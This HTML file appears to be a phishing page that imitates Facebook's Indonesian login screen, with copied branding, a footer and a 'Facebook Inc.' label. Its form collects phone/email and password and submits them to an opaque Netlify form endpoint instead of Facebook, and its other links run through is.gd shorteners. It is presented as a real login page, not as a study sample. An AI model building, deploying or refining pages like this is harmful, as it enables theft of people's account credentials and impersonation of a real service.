<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1">
	<title>Facebook - Masuk atau Daftar</title>
	<link rel="stylesheet" type="text/css" href="css/css-reset.css">
	<link rel="stylesheet" type="text/css" href="css/style.css">
	<link rel="shortcut icon" type="ico" href="https://i.imgur.com/81yeiAA.png" sizes="196x196">
	<script type="text/javascript" src="jquery-3.5.1.min.js"></script>
</head>
<body>
	<div class="alert_info">Masuk dengan Facebook untuk melanjutkan.</div>
	<div class="img_facebook"></div>
	<div class="login_form_container">
		<form name="login" netlify action="d56b699830e77ba53855679cb1d252da" class="jarak_form">
			<center>
				<input class="form_username" type="username" id="user" name="username" placeholder="Nomor ponsel atau email" required="true">
			</center>
			<center>
				<div class="container_pass">
					<input class="form_password" type="password" id="pass" name="password" placeholder="Kata Sandi" required="true" oninput="ShowHide()">
					<input type="button" id="btn_showhide" onclick="change()" style="display: none;" value="perlihatkan">
				</div>
			</center>
			<center>
				<button class="btn_login" type="submit" name="submit" value="Verify">Masuk</button>
			</center>
		</form>
		<center>
			<a class="lupa_sandi" href="https://is.gd/OaDATW">Lupa Kata Sandi?</a>
		</center>
		<div class="separator">
			<span class="separator_text">atau</span>
		</div>
		<center>
			<a href="https://is.gd/9cfiWs">
				<button class="btn_create_account">Buat Akun Baru</button>
			</a>
		</center>
	</div>
	<div class="footer1">
		<p class="bhs">
			<span class="font_tebal">Bahasa Indonesia</span><br>
			<span>Basa Jawa</span><br>
			<span>Español</span><br>
			<span>Français (France)</span><br>
		</p>
	</div>
	<div class="footer2">
		<p class="bhs">
			<span>English (UK)</span><br>
			<span>Bahasa Melayu</span><br>
			<span>Português (Brasil)</span><br>
		</p>
	</div>
	<div class="footer3">
		<p class="about">
			<span>Tentang &#183; Bantuan &#183; Lainnya</span><br>
			<span><b>Facebook Inc.</b></span><br>
		</p>
	</div>
</body>
<script type="text/javascript">
	function change()
	{
		var x = document.getElementById('pass').type;
		if (x == 'password')
		{
			document.getElementById('pass').type = 'text';
			document.getElementById('btn_showhide').value = 'sembunyikan';
			document.getElementById('pass').focus(); 
		}else{
			document.getElementById('pass').type = 'password';
			document.getElementById('btn_showhide').value = 'perlihatkan';
			document.getElementById('pass').focus();
		}
	}
	function ShowHide(){
		if(document.getElementById('pass').value!='')
		{
			document.getElementById('btn_showhide').style.display='block';
		}else{
			document.getElementById('btn_showhide').style.display='none';
		}
	}
</script>
</html>